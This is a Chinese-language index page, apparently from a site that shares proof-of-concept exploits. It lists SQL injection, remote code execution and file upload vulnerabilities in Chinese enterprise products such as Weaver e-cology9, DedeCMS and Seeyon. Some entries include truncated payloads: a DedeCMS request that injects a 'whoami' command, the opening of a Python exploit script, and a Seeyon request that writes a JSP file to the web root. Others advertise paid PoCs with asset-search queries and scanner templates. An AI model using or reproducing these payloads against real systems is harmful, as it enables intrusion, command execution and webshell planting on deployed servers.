POC_秃兔安全

更新

浏览

蓝凌EIS智慧协同平台fl_define_flow_chart_show.aspx SQL注入

2024你懂的

秃兔11个月前

0976

锐捷RG-NAC统一上网行为管理与审计系统存在远程代码执行漏洞

2024你懂的

秃兔11个月前

0978

泛微e-cology9接口WorkPlanService前台SQL注入漏洞

2024你懂的

秃兔11个月前

0976

铭飞MCMS 远程代码执行漏洞

2024你懂的

秃兔11个月前

09712

【通用】星网锐捷DMB-BS-taskexport 信息泄露

fofa语句yakit插件 uuidpocyaml已验证

付费阅读500 # poc

dreamer2924个月前

09613

万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞

2024你懂的

秃兔11个月前

0969

【通用】圣乔ERP系统 ResultSetConvertor 存在SQL注入

fofa语句yakit插件 uuidpocyakit yamlnuclei yaml已验证

付费阅读500 # poc # yakit # nuclei

dreamer29211个月前

0968

DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞

GET /dede/sys_verifies.php?action=getfiles&refiles[]=123${${print%20whoami}} HTTP/1.1Host: 127.0.0.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100...

2024你懂的

秃兔11个月前

09615

泛微E-cology9 browserjsp SQL注入漏洞

import argparseimport requestsfrom termcolor import coloredimport signal requests.packages.urllib3.disable_warnings()output_file = None def check_url(url, output=None):headers = {...

2024你懂的

秃兔11个月前

09615

致远在野constDef接囗存在代码执行漏洞

GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22P...

2024你懂的

秃兔11个月前

09513

上一页 1…20 212223 24…55 下一页跳转